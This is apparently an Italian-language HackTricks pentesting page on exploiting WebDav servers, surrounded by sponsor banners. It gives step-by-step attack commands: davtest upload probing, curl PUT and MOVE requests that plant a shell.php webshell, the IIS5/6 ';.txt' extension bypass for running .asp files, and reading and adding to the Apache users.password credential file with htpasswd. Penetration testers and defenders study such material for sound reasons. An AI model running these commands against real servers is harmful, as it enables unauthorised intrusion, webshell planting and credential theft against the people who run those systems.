# WebDav
\
Usa [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) per creare facilmente e **automatizzare flussi di lavoro** supportati dagli strumenti della comunità più avanzati al mondo.\
Ottieni l'accesso oggi:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
Impara l'hacking di AWS da zero a eroe conhtARTE (HackTricks AWS Red Team Expert)!
Altri modi per supportare HackTricks:
* Se vuoi vedere la tua **azienda pubblicizzata in HackTricks** o **scaricare HackTricks in PDF** Controlla i [**PIANI DI ABBONAMENTO**](https://github.com/sponsors/carlospolop)!
* Ottieni il [**merchandising ufficiale PEASS & HackTricks**](https://peass.creator-spring.com)
* Scopri [**The PEASS Family**](https://opensea.io/collection/the-peass-family), la nostra collezione di [**NFT esclusivi**](https://opensea.io/collection/the-peass-family)
* **Unisciti al** 💬 [**gruppo Discord**](https://discord.gg/hRep4RUj7f) o al [**gruppo telegram**](https://t.me/peass) o **seguici** su **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Condividi i tuoi trucchi di hacking inviando PR ai** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos di github.
Quando si tratta di un **Server HTTP con WebDav** abilitato, è possibile **manipolare file** se si hanno le **credenziali corrette**, di solito verificate tramite **Autenticazione di Base HTTP**. Ottenere il controllo su un tale server spesso comporta **caricare ed eseguire un webshell**.
L'accesso al server WebDav di solito richiede **credenziali valide**, con il [**bruteforce WebDav**](../../generic-methodologies-and-resources/brute-force.md#http-basic-auth) che è un metodo comune per acquisirle.
Per superare le restrizioni sui caricamenti di file, specialmente quelli che impediscono l'esecuzione di script lato server, potresti:
* **Caricare** file con **estensioni eseguibili** direttamente se non sono limitati.
* **Rinominare** i file non eseguibili caricati (come .txt) con un'estensione eseguibile.
* **Copiare** i file non eseguibili caricati, cambiando la loro estensione in una che è eseguibile.
## DavTest
**Davtest** cerca di **caricare diversi file con estensioni diverse** e **controlla** se l'estensione viene **eseguita**:
```bash
davtest [-auth user:password] -move -sendbd auto -url http:// #Uplaod .txt files and try to move it to other extensions
davtest [-auth user:password] -sendbd auto -url http:// #Try to upload every extension
```
## Cadaver
Puoi utilizzare questo strumento per **connetterti al server WebDav** e eseguire azioni (come **caricare**, **spostare** o **eliminare**) **manualmente**.
```
cadaver
```
## Richiesta PUT
```
curl -T 'shell.txt' 'http://$ip'
```
## Richiesta MOVE
```
curl -X MOVE --header 'Destination:http://$ip/shell.php' 'http://$ip/shell.txt'
```
\
Usa [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) per creare facilmente e **automatizzare flussi di lavoro** supportati dagli strumenti della community **più avanzati** al mondo.\
Ottieni l'accesso oggi:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
## Vulnerabilità WebDav in IIS5/6
Questa vulnerabilità è molto interessante. Il **WebDav** **non permette** di **caricare** o **rinominare** file con l'estensione **.asp**. Tuttavia, è possibile **aggirare** questo problema **aggiungendo** alla fine del nome **";.txt"** e il file verrà **eseguito** come se fosse un file .asp (è anche possibile **usare ".html" invece di ".txt"** ma **NON dimenticare il ";"**).
Quindi puoi **caricare** il tuo shell come file ".**txt"** e **copiarlo/spostarlo in un file ".asp;.txt"**. Accedendo a quel file attraverso il server web, verrà **eseguito** (cadaver dirà che l'azione di spostamento non ha funzionato, ma in realtà ha funzionato).
![](<../../.gitbook/assets/image (18) (1) (1).png>)
## Credenziali post
Se il Webdav stava utilizzando un server Apache, dovresti controllare i siti configurati in Apache. Comunemente:\
_**/etc/apache2/sites-enabled/000-default**_
All'interno potresti trovare qualcosa del genere:
```
ServerAdmin webmaster@localhost
Alias /webdav /var/www/webdav
DAV On
AuthType Digest
AuthName "webdav"
AuthUserFile /etc/apache2/users.password
Require valid-user
```
Come puoi vedere, ci sono i file con le credenziali valide per il server **webdav**:
```
/etc/apache2/users.password
```
Dentro questo tipo di file troverai il **nome utente** e un **hash** della password. Queste sono le credenziali che il server webdav utilizza per autenticare gli utenti.
Puoi provare a **decifrarle**, o a **aggiungerne altre** se per qualche motivo desideri **accedere** al server **webdav**:
```bash
htpasswd /etc/apache2/users.password #You will be prompted for the password
```
Per verificare se le nuove credenziali funzionano, puoi fare:
```bash
wget --user --ask-password http://domain/path/to/webdav/ -O - -q
```
## Riferimenti
* [https://vk9-sec.com/exploiting-webdav/](https://vk9-sec.com/exploiting-webdav/)
Impara l'hacking su AWS da zero a eroe conhtARTE (Esperto Red Team AWS di HackTricks)!
Altri modi per supportare HackTricks:
* Se desideri vedere la tua **azienda pubblicizzata su HackTricks** o **scaricare HackTricks in PDF** Controlla i [**PIANI DI ABBONAMENTO**](https://github.com/sponsors/carlospolop)!
* Ottieni il [**merchandising ufficiale di PEASS & HackTricks**](https://peass.creator-spring.com)
* Scopri [**La Famiglia PEASS**](https://opensea.io/collection/the-peass-family), la nostra collezione di [**NFT esclusivi**](https://opensea.io/collection/the-peass-family)
* **Unisciti al** 💬 [**gruppo Discord**](https://discord.gg/hRep4RUj7f) o al [**gruppo telegram**](https://t.me/peass) o **seguici** su **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Condividi i tuoi trucchi di hacking inviando PR a** [**HackTricks**](https://github.com/carlospolop/hacktricks) e ai repository github di [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
\
Usa [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) per costruire facilmente e **automatizzare flussi di lavoro** supportati dagli strumenti **comunitari più avanzati** al mondo.\
Ottieni l'accesso oggi:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}